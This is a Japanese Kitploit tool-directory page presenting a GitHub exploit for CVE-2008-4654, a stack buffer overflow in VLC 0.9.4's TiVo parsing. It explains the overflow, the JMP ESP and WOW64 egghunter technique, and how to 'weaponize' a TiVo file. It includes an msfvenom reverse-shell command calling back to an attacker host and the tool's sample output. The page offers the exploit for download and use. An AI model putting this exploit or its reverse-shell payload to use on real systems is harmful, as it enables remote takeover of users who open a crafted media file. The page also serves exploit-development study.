Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2008-4654 — VideoLanのVLC Media Player 0.9.4のTiVoファイル処理におけるスタックベースのバッファオーバーフローの脆弱性に対する完全に機能するエクスプロイト。 | Kitploit
ツール/GitHubGitHub/hexastrike/cve-2008-4654
脆弱性分析エクスプロイトシェルコードシェルコード生成ペイロード開発バイナリエクスプロイト
GitHubhexastrike/cve-2008-4654

CVE-2008-4654

VideoLanのVLC Media Player 0.9.4のTiVoファイル処理におけるスタックベースのバッファオーバーフローの脆弱性に対する完全に機能するエクスプロイト。

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2008-4654

VideoLan の VLC Media Player 0.9.4 が TiVo ファイルを処理する際のスタックベースのバッファオーバーフロー脆弱性 CVE-2008-4654 に対する完全な機能するエクスプロイトです。64 ビット Windows システム上で動作する 32 ビットバイナリを対象としており、WOW64 エッグハンターを使用して限られたスタック領域をバイパスします。

使用方法

スクリプトの更新:

  • スクリプト内のプレースホルダー buf = b'[...]' を自身のシェルコード(例:msfvenom で生成)に置き換えてください。
  • 別のタグを使用したい場合やカスタムエッグハンターがある場合は、EGG_HUNTER_WOW64 シェルコードを適宜調整してください。
root@kitploit:~
python .\CVE-2008-4654.py --help

CVE-2008-4654 - VLC v0.9.4 Tivo Stack Buffer Overflow - by Maurice Fielenbach (grimlockx) - Hexastrike Cybersecurity UG (haftungsbeschränkt)

usage: CVE-2008-4654.py [-h] --input INPUT --output OUTPUT

Transform a given TiVo file into a weapon with predefined shellcode.

options:
  -h, --help       show this help message and exit
  --input INPUT    Path to the input TiVo file to be weaponized.
  --output OUTPUT  Path where the modified (weaponized) TiVo file will be saved.

動作の仕組み

  • スクリプトは、TiVo ファイル内の特定のバイトパターン (TIVO_PES_FILEID) を検索します。
  • パターンの 20 バイト後にある 4 バイトのフィールドを b"\x00\x00\x00\xff" で上書きし、範囲外読み出しを設定してスタックオーバーフローを引き起こします。
  • 次に、TIVO_PES_FILEID から 92 バイト後にある別の領域をカスタムペイロードで置き換えます。
  • ペイロードには以下が含まれます:
    • 実行をスタックに誘導する JMP ESP アドレス。
    • マーカー w00tw00t をメモリ内でスキャンする WOW64 固有のエッグハンター。
    • マーカーの後に配置された、限られたスタック領域を超える大きなユーザー定義シェルコードペイロード(第 2 ステージ)。
  • VLC が改変された TiVo ファイルを処理すると、最終的にオーバーフローがトリガーされ、エッグハンターが実行されます。エッグハンターは完全なシェルコードを見つけて実行し、スタックサイズの制限をバイパスします。

例

ペイロード生成

root@kitploit:~
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.10.150 LPORT=6666 -a x86 -f python -b '\x00'

TiVo ファイル作成

  • プレースホルダー buf = b'[...]' を先に作成したシェルコードに置き換えてください。
  • サンプル TiVo ファイルを https://samples.mplayerhq.hu/TiVo/ からダウンロードしてください。
root@kitploit:~
PS C:\ > python .\CVE-2008-4654.py --input .\test.ty --output .\hazard.ty

CVE-2008-4654 - VLC v0.9.4 Tivo Stack Buffer Overflow - by Maurice Fielenbach (grimlockx) - Hexastrike Cybersecurity UG (haftungsbeschränkt)

[+] Found TIVO_PES_FILEID at offset 0x300000.
[+] Replaced 4 bytes at offset 0x300014 with 0x000000ff.
[+] Replaced 685 bytes at offset 0x30005c.
[+] Successfully weaponized: .\hazard.ty

注意事項

  • このエクスプロイトは WOW64 エッグハンターを使用するため、x64 Windows でのみ動作します。純粋な x86 アプローチでは、32 ビットシステムに適した標準的なエッグハンターが必要になります。
  • この特定のベクターでは \x00 以外に大きな悪意のある文字はないため、ペイロード生成が容易です。
  • エッグハンティングと WOW64 の詳細については、Corelan の WOW64 Egghunter 記事 と Matt (Skape) Millers の論文 を参照してください。

リソース

  • https://nostarch.com/bughunter
  • https://nvd.nist.gov/vuln/detail/CVE-2008-4654
  • https://hexastrike.com/resources/blog/exploit-development/vlc-stack-based-buffer-overflow-exploiting-cve-2008-4654-with-a-wow64-egghunter/
  • https://www.corelan.be/index.php/2011/11/18/wow64-egghunter/
  • https://www.hick.org/code/skape/papers/egghunt-shellcode.pdf
  • https://samples.mplayerhq.hu/TiVo/
ツールをダウンロード